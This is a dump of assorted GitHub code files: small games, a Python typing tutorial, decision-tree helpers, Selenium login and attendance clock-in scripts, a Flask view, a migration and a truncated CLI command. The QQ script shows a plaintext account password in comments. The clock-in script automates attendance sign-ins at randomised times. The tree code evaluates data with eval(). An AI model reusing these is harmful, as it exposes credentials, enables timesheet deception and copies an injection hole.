10)\r\nprint(\"\"\"\t\t######系统将要产生1-10随机数######\r\n\t #########猜对直接进入游戏###############\r\n\t ########猜大会提示大,猜小提示小了########\r\n\t###猜错6次也可以进入游戏,但本次游戏未通关####\r\n\r\n\t\"\"\")\r\nprint(number)\r\nwhile True:\r\n num = int(input(\"请输入您要猜的整数\"))\r\n count1 += 1\r\n if (count1 < 6):\r\n if (num == number):\r\n print(\"您通关了,总共输入了%d次\\n\" % (count1))\r\n print(\"成功,进入下一个游戏\\n\")\r\n break\r\n elif (num < number):\r\n print(\"您输入小了,请再猜猜看\\n\")\r\n else:\r\n print(\"您输入大了,请再猜猜看\\n\")\r\n else:\r\n print(\"\"\"\t ******本关未通关*********\r\n *******输入次数已经达到6次***\r\n *********进入下一个游戏************\r\n\r\n \"\"\")\r\n break\r\n\r\npg.init()\r\nprint(\"游戏开始,您的初始分值为0\\n\")\r\ngame_window = pg.display.set_mode((600, 500))\r\npg.display.set_caption('接球小游戏')\r\nwindow_color = (0, 0, 255)\r\nball_color = (255, 165, 0)\r\nrect_color = (255, 0, 0)\r\nscore = 0\r\nfont = pg.font.SysFont('arial', 70)\r\nball_x = random.randint(20, 580)\r\nball_y = 20\r\nmove_x = 1\r\nmove_y = 1\r\npoint = 1\r\ncount = 0\r\nwhile True:\r\n game_window.fill(window_color)\r\n for event in pg.event.get():\r\n if event.type == pg.QUIT:\r\n sys.exit()\r\n mouse_x, mouse_y = pg.mouse.get_pos()\r\n pg.draw.circle(game_window, ball_color, (ball_x, ball_y), 20)\r\n pg.draw.rect(game_window, rect_color, (mouse_x, 490, 100, 10))\r\n my_text = font.render(str(score), False, (255, 255, 255))\r\n game_window.blit(my_text, (500, 30))\r\n ball_x += move_x\r\n ball_y += move_y\r\n if ball_x <= 20 or ball_x >= 580:\r\n move_x = -move_x\r\n if ball_y <= 20:\r\n move_y = -move_y\r\n elif mouse_x - 20 < ball_x < mouse_x + 120 and ball_y >= 470:\r\n move_y = -move_y\r\n score += point\r\n count += 1\r\n if count == 3:\r\n count = 0\r\n point += point\r\n if move_x > 0:\r\n move_x += 1\r\n else:\r\n move_x -= 1\r\n move_y -= 1\r\n elif ball_y >= 480 and (ball_x <= mouse_x - 20 or ball_x >= mouse_x + 120):\r\n time.sleep(3)\r\n break\r\n pg.display.update()\r\n time.sleep(0.005)\r\nprint(\"游戏结束,您的得分为%d\" % (score))\r\n","repo_name":"suntaopython/-games","sub_path":"over_project.py","file_name":"over_project.py","file_ext":"py","file_size_in_byte":3707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} 
+{"seq_id":"33176506369","text":"\"\"\"\n* Optional Types\n* 있을 수도 있고, 없을 수도 있는 Type 지정\n* Optional Types는 Union Types로 대체될 수 있음!(= 유사한 기능)\n\"\"\"\nfrom typing import Union, Optional\n\n\n# Union Types를 사용한 경우\nxxx: Union[str, None] = \"hinodi5\"\n\nxxx = None\n\n\n# Optional Types를 사용한 경우\nyyy: Optional[str] = \"hinoi5\"\n\nyyy = None\n\n\n# Optional Types가 필요한 이유 : '있을 수도 있고, 없을 수도 있는 경우가 많기 때문!'\ndef foo(name: str) -> Optional[str]:\n if name == \"hinodi5\":\n return None\n else:\n return name\n\n\nresult: Optional[str] = foo(\"hinodi5\")\nprint(result)\n\"\"\"\n$ mypy 18-optional_types.py && python 18-optional_types.py \nSuccess: no issues found in 1 source file\nNone\n\"\"\"\n","repo_name":"jinhyungrhee/type_python","sub_path":"18-optional_types.py","file_name":"18-optional_types.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13372989809","text":"import math\n\n# compute Entropy\ndef entD (dataSet, feature) :\n values = dataSet[feature].value_counts(normalize=True)\n sum = 0\n for i in values :\n sum += i* math.log2(i)\n sum = -sum\n return sum\n\n\n# compute gain and IV, return a Dict\ndef getGainDicByFeature(dataSet, feature, entDValue, entD_feature,entireAttrSet) :\n\n valuesRateList = dataSet[feature].value_counts(normalize=True)\n num = len(valuesRateList)\n valuesList = dataSet[feature]\n\n attiData = []\n entList = []\n entSum = 0\n sum = 0\n IV = 0\n\n # Judge whether it is a continuous value\n if( entireAttrSet[feature]['ifContinuous']) :\n dict = _getGainDicByFeatureInContinuous(dataSet, feature, entDValue, entD_feature )\n return dict\n else :\n for i in range(num) :\n attiData.append(dataSet[dataSet[feature] == valuesRateList.index[i] ])\n entList.append (entD (attiData[i], entD_feature))\n entSum += valuesRateList[valuesRateList.index[i]] * entList[i]\n\n ratio = valuesRateList[valuesRateList.index[i]]\n sum += ratio * math.log2(ratio)\n\n IV = -sum\n gain = entDValue - entSum\n return {'gain':gain, 'IV':IV, 'continuous': False}\n\n\ndef attrSetGenerate (dataSet) :\n #print('current Function: attrSetGenerate') \n\n attrSet = {}\n ent_attrition = entD(dataSet, 'Attrition')\n for index in dataSet.columns :\n if index!='Attrition' :\n #print('current Feature: ',index)\n \n attrSet[index] = {}\n valuesList = dataSet[index]\n valuesRateList = dataSet[index].value_counts(normalize=True)\n num = len(valuesRateList)\n\n #Judge whether it is a continuous value\n if( len(valuesRateList) >=15 and str(valuesList[valuesList.index[0]]).isdigit()) :\n #dict = _getGainDicByFeatureInContinuous(dataSet, index, ent_attrition, 'Attrition')\n #attrSet[index] = {'bestBoundary': dict['bestBoundary']} \n attrSet[index] = {'ifContinuous':True}\n\n else :\n attrSet[index]['Attribution'] = []\n for i in range(num) :\n attrSet[index]['Attribution'].append(valuesRateList.index[i])\n #print(valuesRateList.index[i])\n attrSet[index]['ifContinuous'] = False\n\n #print(attrSet)\n return attrSet\n \n\ndef _getGainDicByFeatureInContinuous (dataSet, feature, entDValue, entD_feature) :\n #order\n orderedDataSet = dataSet.sort_values(by=feature)\n orderedValuesList = orderedDataSet[feature].reset_index(drop=True)\n\n bestBoundary = ( orderedValuesList[0] + orderedValuesList[1] ) / 2\n bestGain = 0\n IV = 0\n bestI = 0\n\n ListNum = len(dataSet)\n\n #Loops get the best demarcation\n for i in range(ListNum) :\n P = (i+1)/ListNum\n attiData = []\n entList = []\n\n attiData.append(orderedDataSet[0:i+1])\n 
attiData.append(orderedDataSet[i+1:])\n\n entList.append( entD( attiData[0], entD_feature ))\n entList.append( entD( attiData[1], entD_feature ))\n\n entSum = P * entList[0] + (1-P) * entList[1]\n gain = entDValue - entSum\n\n if gain >= bestGain :\n bestGain = gain\n bestBoundary = ( orderedValuesList[i] + orderedValuesList[i+1] ) / 2;\n bestI = i\n IV = -(P* math.log2(P) + (1-P) * math.log2(1 - P))\n\n return {'gain': bestGain, 'IV':IV, 'continuous': True, 'bestBoundary': bestBoundary, 'bestI':bestI}\n\n\ndef ifSameClass(dataSet, feature) :\n\n valuesRateList = dataSet[feature].value_counts(normalize=True)\n\n if (len(valuesRateList) == 1):\n return valuesRateList.index[0]\n else :\n return 0\n\ndef ifAllClassSame(dataSet) :\n df2 = dataSet.copy()\n del df2['Attrition']\n for index in df2.columns :\n values = df2[index].value_counts(normalize=True)\n if(len(values) != 1) :\n return 0 \n\n return 1\n\ndef getClass(dataSet, predictfeature) :\n \n bestClass = ''\n bestRate = 0\n valuesRateList = dataSet[predictfeature].value_counts(normalize=True)\n \n for i in range(len(valuesRateList)) :\n if valuesRateList[valuesRateList.index[i]] > bestRate :\n bestClass = valuesRateList.index[i]\n bestRate = valuesRateList[valuesRateList.index[i]]\n\n return bestClass\n\ndef featureClass(tree, data):\n curNode = list(tree.keys())\n if curNode[0] == 'Attrition' :\n return tree['Attrition']\n else :\n keyList = list(tree[curNode[0]].keys())\n if(ifContinuous(keyList)) :\n if(eval(str(data[curNode[0]]) + keyList[0])) :\n return featureClass(tree[curNode[0]][keyList[0]],data)\n else :\n return featureClass(tree[curNode[0]][keyList[1]],data)\n else :\n return featureClass(tree[curNode[0]][data[curNode[0]]],data)\n\ndef ifContinuous(keyList) :\n for i in keyList :\n if '>=' in str(i) :\n return True\n return 0 \n\n\n\n\n\n\n\n","repo_name":"MarioBrosECS/predicting-employee-attrition-Soton-ECS","sub_path":"src/models/decisionTree/algorithm_Ernest/API_Ernest.py","file_name":"API_Ernest.py","file_ext":"py","file_size_in_byte":5045,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"72229168553","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time :2020/7/18 20:38\n# @Author :DKJ\n# @File :04模拟登录qq空间.py\n# @Software :PyCharm\n\nimport requests\nfrom selenium import webdriver\nfrom lxml import etree\nimport time\ndriver = webdriver.Chrome(executable_path='./chromedriver')\ndriver.get('https://qzone.qq.com/')\n#在web 应用中经常会遇到frame 嵌套页面的应用,使用WebDriver 每次只能在一个页面上识别元素,对于frame 嵌套内的页面上的元素,直接定位是定位是定位不到的。这个时候就需要通过switch_to_frame()方法将当前定位的主体切换了frame 里。\ndriver.switch_to.frame('login_frame')\ndriver.find_element_by_id('img_out_1016617094').click()\n# driver.find_element_by_id('switcher_plogin').click()\n#driver.find_element_by_id('u').clear()\n# driver.find_element_by_id('u').send_keys('1016617094') #这里填写你的QQ号\n#driver.find_element_by_id('p').clear()\n# driver.find_element_by_id('p').send_keys('dkj011018') #这里填写你的QQ密码\n# driver.find_element_by_id('login_button').click()\ntime.sleep(2)\ndriver.execute_script('window.scrollTo(0,document.body.scrollHeight)')\ntime.sleep(2)\ndriver.execute_script('window.scrollTo(0,document.body.scrollHeight)')\ntime.sleep(2)\ndriver.execute_script('window.scrollTo(0,document.body.scrollHeight)')\ntime.sleep(2)\n# page_text = driver.page_source\n# tree = etree.HTML(page_text)\n# #执行解析操作\n# li_list = tree.xpath('//ul[@id=\"feed_friend_list\"]/li')\n# for li in li_list:\n# text_list = 
li.xpath('.//div[@class=\"f-info\"]//text()|.//div[@class=\"f-info qz_info_cut\"]//text()')\n# text = ''.join(text_list)\n# print(text+'\\n\\n\\n')\ndriver.close()","repo_name":"Kedreamix/fun_spider","sub_path":"05.动态加载数据处理/04模拟登录qq空间.py","file_name":"04模拟登录qq空间.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3216475349","text":"from __future__ import absolute_import\n\nfrom datetime import datetime, timedelta\nfrom flask.ext.restful import reqparse\n\nfrom changes.api.base import APIView\nfrom changes.models.jobstep import JobStep\nfrom changes.models.node import Cluster, Node\n\n\nclass ClusterNodesAPIView(APIView):\n parser = reqparse.RequestParser()\n parser.add_argument('since', type=int, location='args')\n\n def get(self, cluster_id):\n cluster = Cluster.query.get(cluster_id)\n if cluster is None:\n return '', 404\n\n queryset = Node.query.filter(\n Node.clusters.contains(cluster),\n ).order_by(Node.label.asc())\n\n args = self.parser.parse_args()\n if args.since:\n cutoff = datetime.utcnow() - timedelta(days=args.since)\n\n queryset = queryset.join(\n JobStep, JobStep.node_id == Node.id,\n ).filter(\n JobStep.date_created > cutoff,\n ).group_by(Node)\n\n return self.paginate(queryset)\n","repo_name":"dropbox/changes","sub_path":"changes/api/cluster_nodes.py","file_name":"cluster_nodes.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":758,"dataset":"github-code","pt":"72"} +{"seq_id":"24483529090","text":"print(\"Starting\")\r\n\r\nimport dioph, useful\r\n\r\n##need 0=5b^2-4L^2+-8b+4\r\n\r\nsolutionNeg = [16,17]\r\nsolutionPlus =[272,305]\r\n## P Q K R S L\r\n## X_(n+1) = PX_n+QY_n+K\r\n## Y_(n+1) = RX_n+SY_n+L\r\n\r\n##These are from http://www.alpertron.com.ar/QUAD.HTM\r\n##after inserting the equation\r\nplusRecCoeff= [-9,-8,-8,-10,-9,-8]\r\nnegRecCoeff= [-9,-8,8,-10,-9,8]\r\n\r\n\r\ndef nextNeg(val):\r\n x = val[0]\r\n y = val[1]\r\n xnew = negRecCoeff[0]*x+negRecCoeff[1]*y+negRecCoeff[2]\r\n ynew = negRecCoeff[3]*x+negRecCoeff[4]*y+negRecCoeff[5]\r\n return [xnew,ynew]\r\ndef nextPlus(val):\r\n x = val[0]\r\n y = val[1]\r\n xnew = plusRecCoeff[0]*x+plusRecCoeff[1]*y+plusRecCoeff[2]\r\n ynew = plusRecCoeff[3]*x+plusRecCoeff[4]*y+plusRecCoeff[5]\r\n return [xnew,ynew]\r\n\r\ncurrentNeg = solutionNeg\r\ncurrentPlus = solutionPlus\r\nanswer = 17+305\r\nfor i in range(5):\r\n currentNeg = nextNeg(currentNeg)\r\n currentPlus = nextPlus(currentPlus)\r\n currentNeg = nextNeg(currentNeg)\r\n currentPlus = nextPlus(currentPlus)\r\n answer += currentNeg[1]\r\n answer += currentPlus[1]\r\n\r\nprint(answer)\r\n \r\n","repo_name":"alexandrepoulin/ProjectEulerInPython","sub_path":"problems/problem 138.py","file_name":"problem 138.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27393374899","text":"import sys, re\nimport xml.etree.ElementTree as ET\n\n\n\nif __name__ == '__main__':\n\troot = ET.parse(sys.stdin).getroot()\n\n\tfor sentence in root.iter('s'):\n\t\tfor latin in sentence.iterfind('foreign'):\n\t\t\tsentence.remove(latin)\n\n\t\tcontent = \"\".join(sentence.itertext())\n\n\t\tif content != '' and content != ' ':\n\t\t\tprint(content) 
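\n\n# Hypothetical usage note (file names are examples, not from the repo): the script reads\n# the corpus XML on stdin, drops <foreign> spans inside each <s>, and prints one cleaned\n# sentence per line, e.g.  python clean_toronto_oe_corpus.py < corpus.xml > sentences.txt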
","repo_name":"cltk/ang_models_cltk","sub_path":"src/python/clean_toronto_oe_corpus.py","file_name":"clean_toronto_oe_corpus.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"40404092517","text":"\"\"\"empty message\n\nRevision ID: 44194fb1a53f\nRevises: b8364b16d6af\nCreate Date: 2019-05-15 14:44:17.320022\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '44194fb1a53f'\ndown_revision = 'b8364b16d6af'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.alter_column('tutor', 'hourlyrate',\n existing_type=sa.INTEGER(),\n nullable=True)\n op.add_column('tutorlocation', sa.Column('id', sa.Integer(), nullable=False, primary_key=True))\n op.drop_table('tutorlocation')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('tutorlocation', 'id')\n op.alter_column('tutor', 'hourlyrate',\n existing_type=sa.INTEGER(),\n nullable=False)\n # ### end Alembic commands ###\n","repo_name":"nataliehoang91/flask-db-api","sub_path":"migrations/versions/44194fb1a53f_.py","file_name":"44194fb1a53f_.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9181711570","text":"from decimal import Decimal\nfrom django.conf import settings\nfrom django.template.defaultfilters import floatformat\nfrom shop.util.btc_helper import Coindesk_Exchange, BC, CNB_Exchange\n\nclass ExchangeService(object):\n\n def __init__(self, request):\n btc = Coindesk_Exchange(request)\n cnb = CNB_Exchange(request)\n self.btc_in_dollar = btc.get_btc_in_dollar()\n self.dollar_in_usd = Decimal('1')\n self.dollar_in_czk = cnb.get_dollar_in_czk()\n self.dollar_in_btc = Decimal('1') / self.btc_in_dollar\n\n\n self.koruna_in_usd = Decimal('1')/self.dollar_in_czk\n self.koruna_in_czk = Decimal('1')\n self.koruna_in_btc = Decimal('1') / (btc.get_btc_in_dollar()*self.dollar_in_czk)\n\n def convert_dollar_into(self, amount, currency):\n if currency == 'CZK':\n price = amount * self.dollar_in_czk\n return price\n elif currency == 'USD':\n price = amount * self.dollar_in_usd\n return price\n elif currency == 'BTC':\n price = amount * self.dollar_in_btc\n return price\n else:\n raise KeyError\n\n def convert_koruna_into(self, amount, currency):\n if currency == 'CZK':\n price = amount * self.koruna_in_czk\n return price\n elif currency == 'USD':\n price = amount * self.koruna_in_usd\n return price\n elif currency == 'BTC':\n price = amount * self.koruna_in_btc\n return price\n else:\n raise KeyError\n\n def price_in_usd(self, amount):\n if settings.PRIMARY_CURRENCY == 'CZK':\n new_value = self.convert_koruna_into(amount, 'USD')\n else:\n raise ValueError\n s = floatformat(new_value, 2)\n s = s.replace(',', '.')\n return Decimal(str(s))\n\n def one_btc_in_czk(self):\n if settings.PRIMARY_CURRENCY == 'CZK':\n new_value = self.btc_in_dollar * self.dollar_in_czk\n else:\n raise ValueError\n s = floatformat(new_value, 2)\n s = s.replace(',', '.')\n return Decimal(str(s))\n\n def convert_to_dec(self, price):\n f = round(price, 2)\n s = str(f) + '0000000000'\n n = s.index('.')\n return Decimal(s[0:n+2])\n # Decimal(str(round(price, 2)) + 
'0')","repo_name":"totoropy/joeshop","sub_path":"vitashop/exchange.py","file_name":"exchange.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20777607545","text":"from django.core.paginator import Paginator\n\ndef pagination(request, posts, num_of_pages):\n paginator = Paginator(posts, num_of_pages)\n page_number = request.GET.get('page')\n return paginator.get_page(page_number)\n\n\ndef select_post(posts):\n new_posts = list()\n for post in posts:\n comments = list()\n for comment in post.commented_post.all().order_by('-date'):\n new_comment = {\n \"author\": comment.author,\n \"image\": comment.author.image.url,\n \"id\": comment.id,\n \"date\": comment.date,\n \"content\": comment.content,\n \"likes\": comment.liked_comment.filter(is_active=True).count(),\n \"like_authors\": [comment_author.author for comment_author in comment.liked_comment.filter(is_active=True)]\n }\n comments.append(new_comment)\n new_post = {\"author\": post.author,\n \"image\": post.author.image.url,\n \"id\": post.id,\n \"likes\": post.liked_post.filter(is_active=True).count(),\n \"like_authors\": [post_author.author for post_author in post.liked_post.filter(is_active=True)],\n \"date\": post.date,\n \"content\": post.content,\n \"comments\": comments,\n }\n new_posts.append(new_post)\n return new_posts","repo_name":"Bartlomiej-Madaj/Network","sub_path":"network/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74429372394","text":"import collections\n\nBIGINT = int(1e9 + 7)\n\nN, M = map(int, input().split())\ninvalid = {int(input()) for _ in range(M)}\ndp = collections.defaultdict(int)\ndp[0] = 1\nfor i in range(1, N + 1):\n if i in invalid:\n dp[i] = 0\n else:\n dp[i] = (dp[i - 1] + dp[i - 2]) % BIGINT\n\nprint(dp[N])\n","repo_name":"yamaton/atcoder","sub_path":"abc129/abc129_c.py","file_name":"abc129_c.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39655513851","text":"\n\n\"\"\"\nGiven an array/list [] of integers , Construct a product array Of same size Such That prod[i] is equal to The Product of all the elements of Arr[] except Arr[i].\n\n\"\"\"\n\ndef product_array(numbers):\n res = []\n i = 0\n\n\n while i < len(numbers):\n nums = numbers[:i] + numbers[i+1:]\n j = 0\n s = 1\n \n for num in nums:\n s *= num\n \n res.append(s) \n i += 1\n \n return res\n\nproduct_array([16,17,4,3,5,2])","repo_name":"jkfer/Codewars","sub_path":"productArray.py","file_name":"productArray.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"69904736234","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nimport requests\nimport json\nfrom bs4 import BeautifulSoup\nimport urllib.request\nimport time\nfrom openpyxl import load_workbook\nfrom openpyxl import Workbook\nfrom datetime import date, datetime\nimport random\nfrom apscheduler.schedulers.blocking import BlockingScheduler\n\ndef work():\n\n current_date_and_time = datetime.now()\n current_hour = current_date_and_time.hour\n\n if current_hour >= 17: # 下班\n min_to_start = random.randint(11, 20)\n else: # 上班\n min_to_start = random.randint(1, 10)\n time.sleep(min_to_start * 60)\n \n 
chrome_options = Options()\n chrome_options.add_argument('--no-sandbox')\n chrome_options.add_argument('--disable-dev-shm-usage')\n chrome_options.add_argument('--headless')\n\n singin_url = \"https://my.ntu.edu.tw/attend/ssi.aspx?from=signNote\"\n driver = webdriver.Chrome(chrome_options=chrome_options) #webdriver.Chrome()\n web = driver.get(singin_url)\n\n try:\n login_button = driver.find_element_by_id(\"divLogin\")\n login_button.click()\n\n name = driver.find_element_by_name(\"user\")\n name.send_keys(\"account\")\n\n password = driver.find_element_by_name(\"pass\")\n password.send_keys(\"password\")\n\n login_button = driver.find_element_by_name(\"Submit\")\n login_button.click()\n except:\n with open('record.txt','a') as f:\n f.write('no need to login again. ')\n f.close()\n\n try:\n if current_hour >= 17: # 下班\n login_button = driver.find_element_by_id(\"btSign2\")\n login_button.click()\n else: # 上班\n login_button = driver.find_element_by_id(\"btSign\")\n login_button.click()\n except:\n with open('record.txt','a') as f:\n f.write('failed at ')\n f.close()\n\n with open('record.txt','a') as f:\n f.write(datetime.now().strftime('%Y-%m-%d %H:%M:%S') + '\\n')\n f.close()\n\n driver.close()\n\nif __name__ == '__main__':\n scheduler = BlockingScheduler()\n scheduler.add_job(work, 'cron', minute=\"00\",hour=\"8,17\",day_of_week=\"mon-fri\")\n try:\n scheduler.start()\n except (KeyboardInterrupt, SystemExit):\n scheduler.shutdown()\n","repo_name":"I-am-ZiHao/Auto_Clock_In","sub_path":"card.py","file_name":"card.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27765272780","text":"from player import Player\r\nfrom enemy import Enemy\r\nfrom enemy import Elf\r\nfrom enemy import Orc\r\nimport random\r\n\r\np1 = Player()\r\ne1 = Enemy(p1.position_x, p1.position_y)\r\n\r\nenemy_list = []\r\nenemy_list.append(e1)\r\n\r\ngameover = False\r\nposition_list = [[\"_\", \"_\", \"_\",\"_\", \"_\"], \r\n\t\t\t\t[\"_\", \"_\", \"_\", \"_\", \"_\"], \r\n\t\t\t\t[\"_\", \"_\", \"_\", \"_\", \"_\"], \r\n\t\t\t\t[\"_\", \"_\", \"_\", \"_\", \"_\"],\r\n\t\t\t\t[\"_\", \"_\", \"_\", \"_\", \"_\"]]\r\n\r\ndef update_grid():\r\n\tglobal position_list\r\n\tposition_list = [[\"_\", \"_\", \"_\",\"_\", \"_\"], \r\n\t\t\t\t[\"_\", \"_\", \"_\", \"_\", \"_\"], \r\n\t\t\t\t[\"_\", \"_\", \"_\", \"_\", \"_\"], \r\n\t\t\t\t[\"_\", \"_\", \"_\", \"_\", \"_\"],\r\n\t\t\t\t[\"_\", \"_\", \"_\", \"_\", \"_\"]]\r\n\r\n\tposition_list[p1.position_y][p1.position_x] = \"웃\"\r\n\t\r\n\tfor enemy in enemy_list:\r\n\t\tposition_list[enemy.position_y][enemy.position_x] = enemy.symbol\r\n\r\ndef update_game():\r\n\tupdate_grid()\r\n\tkill_enemies()\r\n\tspawn_enemies()\r\n\tprint_game()\r\n\r\ndef game():\r\n\tglobal position_list\r\n\r\n\twhile(not gameover):\r\n\r\n\t\t# RODADA DO PLAYER\r\n\t\twhile(p1.mana > 0):\r\n\t\t\tupdate_game()\r\n\t\t\tjogada = input('diga a sua jogada\\n')\r\n\t\t\tp1.play(jogada, enemy_list)\r\n\r\n\r\n\r\n\t\t# RODADA DOS INIMIGOS\r\n\t\tupdate_game()\r\n\t\tfor enemy in enemy_list:\r\n\t\t\tenemy.play(p1.position_x, p1.position_y, p1)\t\r\n\r\n\t\tupdate_game()\r\n\r\n\t\tgameover_check()\r\n\t\tp1.mana = 2\r\n\t\t\r\ndef kill_enemies():\r\n\tfor enemy in enemy_list:\r\n\t\tif enemy.hp <= 0: \r\n\t\t\tenemy_list.remove(enemy)\r\n\r\n\r\ndef print_game():\r\n\tfor i in 
range(50):\r\n\t\tprint(\"\")\r\n\tprint(position_list[0])\r\n\tprint(position_list[1])\r\n\tprint(position_list[2])\r\n\tprint(position_list[3])\r\n\tprint(position_list[4])\r\n\tprint(\"\")\r\n\tprint(\"vida do player:\", p1.hp*\"♥ \")\r\n\tprint(\"mana do player:\", p1.mana*\"✰ \")\r\n\tprint(\"vida do inimigo:\", enemy_list[0].hp, \"HP\")\r\n\tprint(\"\")\r\n\r\ndef spawn_enemies():\r\n\tglobal enemy_list\r\n\tglobal p1\r\n\tif len(enemy_list) == 0:\r\n\t\tchoice = random.randint(1,2)\r\n\t\tif choice == 1:\r\n\t\t\tenemy = Elf(p1.position_x, p1.position_y)\r\n\t\telif choice == 2:\r\n\t\t\tenemy = Orc(p1.position_x, p1.position_y)\r\n\r\n\t\tenemy_list.append(enemy)\r\n\r\ndef gameover_check():\r\n\tglobal p1\r\n\tglobal gameover\r\n\tif p1.hp <= 0:\r\n\t\tgameover = True\r\n\t\tcoin = input(\"gameover insert a coin to continue . . .\\n\")\r\n\t\tif coin == \"coin\":\r\n\t\t\tgameover = False\r\n\t\t\treset()\r\n\r\ndef reset():\r\n\tglobal p1\r\n\tglobal e1\r\n\tglobal enemy_list\r\n\r\n\tp1 = Player()\r\n\te1 = Enemy(p1.position_x, p1.position_y)\r\n\r\n\tenemy_list = []\r\n\tenemy_list.append(e1)\r\n\r\n\r\nupdate_grid()\r\nprint_game()\r\ngame()\r\n\r\n# COMENTARIO TESTE DO GIT\r\n#gluglu\r\n\r\n\r\n\r\n","repo_name":"ianobraczka/RPGzada","sub_path":"rpg.py","file_name":"rpg.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22791656278","text":"import argparse\nimport datetime\nimport json\nimport subprocess\n\nimport termcolor\n\nfrom dt_shell import DTCommandAbs, dtslogger\nfrom dt_shell.env_checks import get_dockerhub_username, check_docker_environment\nfrom dt_shell.remote import dtserver_submit, get_duckietown_server_url\nfrom dt_shell.utils import format_exception\n\n\ndef tag_from_date(d):\n # YYYY-MM-DDTHH:MM:SS[.mmmmmm][+HH:MM].\n s = d.isoformat()\n\n s = s.replace(':', '_')\n s = s.replace('T', '_')\n s = s.replace('-', '_')\n s = s[:s.index('.')]\n return s\n\n\ndef build(username, challenge, do_push=True, no_cache=False):\n tag = tag_from_date(datetime.datetime.now())\n df = 'Dockerfile'\n image = '%s/%s:%s' % (username.lower(), challenge.lower() + '-submission', tag)\n\n if not os.path.exists(df):\n msg = 'I expected to find the file \"%s\".' 
% df\n raise Exception(msg)\n\n cmd = ['docker', 'build',\n '-t', image,\n '-f', df,\n '.',\n ]\n\n if no_cache:\n cmd.append('--no-cache')\n print(cmd)\n p = subprocess.Popen(cmd)\n p.communicate()\n if p.returncode != 0:\n msg = 'Could not run docker build.'\n raise Exception(msg)\n\n if do_push:\n cmd = ['docker', 'push', image]\n p = subprocess.Popen(cmd)\n p.communicate()\n p.communicate()\n\n if p.returncode != 0:\n msg = 'Could not run docker push.'\n\n msg += '\\n\\nI tried to push the tag\\n\\n %s' % image\n\n msg += '\\n\\nYou told me your DockerHub username is \"%s\"' % username\n\n msg += '\\n\\nEither the username is wrong or you need to login using \"docker login\".'\n\n msg += '\\n\\nTo change the username use\\n\\n dts challenges config --docker-username USERNAME'\n raise Exception(msg)\n\n return image\n\n\nclass DTCommand(DTCommandAbs):\n\n @staticmethod\n def command(shell, args):\n check_docker_environment()\n\n token = shell.get_dt1_token()\n\n prog = 'dts challenges submit'\n usage = \"\"\"\n \n\nSubmission:\n\n %(prog)s --challenge NAME\n\n\n\n## Building options\n\nRebuilds ignoring Docker cache\n\n %(prog)s --no-cache\n\n\n\n## Attaching user data\n \nSubmission with an identifying label:\n\n %(prog)s --user-label \"My submission\" \n \nSubmission with an arbitrary JSON payload:\n\n %(prog)s --user-meta '{\"param1\": 123}' \n \n\n \n \n\"\"\"\n parser = argparse.ArgumentParser(prog=prog, usage=usage)\n\n group = parser.add_argument_group(\"Submission identification\")\n parser.add_argument('--challenge',\n help=\"Specify challenge name.\", default=None)\n group.add_argument('--user-label', dest='message', default=None, type=str,\n help=\"Submission message\")\n group.add_argument('--user-meta', dest='metadata', default=None, type=str,\n help=\"Custom JSON structure to attach to the submission\")\n\n group = parser.add_argument_group(\"Building settings.\")\n group.add_argument('--no-push', dest='no_push', action='store_true', default=False,\n help=\"Disable pushing of container\")\n group.add_argument('--no-submit', dest='no_submit', action='store_true', default=False,\n help=\"Disable submission (only build and push)\")\n group.add_argument('--no-cache', dest='no_cache', action='store_true', default=False)\n\n group.add_argument('-C', dest='cwd', default=None, help='Base directory')\n\n parsed = parser.parse_args(args)\n\n do_push = not parsed.no_push\n\n if parsed.cwd is not None:\n dtslogger.info('Changing to directory %s' % parsed.cwd)\n os.chdir(parsed.cwd)\n\n if not os.path.exists('submission.yaml'):\n msg = 'Expected a submission.yaml file in %s.' 
